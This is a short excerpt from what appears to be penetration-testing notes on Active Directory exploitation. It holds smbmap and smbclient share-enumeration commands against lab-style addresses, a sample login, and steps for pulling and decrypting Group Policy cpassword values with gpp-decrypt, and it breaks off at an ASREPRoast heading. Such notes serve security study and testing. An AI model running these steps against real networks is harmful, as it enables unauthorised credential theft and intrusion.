Active Directory Exploitation
Initial access SMB Enumeration smbmap -H 10.10.10.100 smbmap -H 10.10.10.100 -R # recursive smbmap -H 10.10.10.192 -u null smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!' If access on GPO Policies search for cpasswords in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt with gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ASREPRoast Finding users that don't require preauth. We can... » read more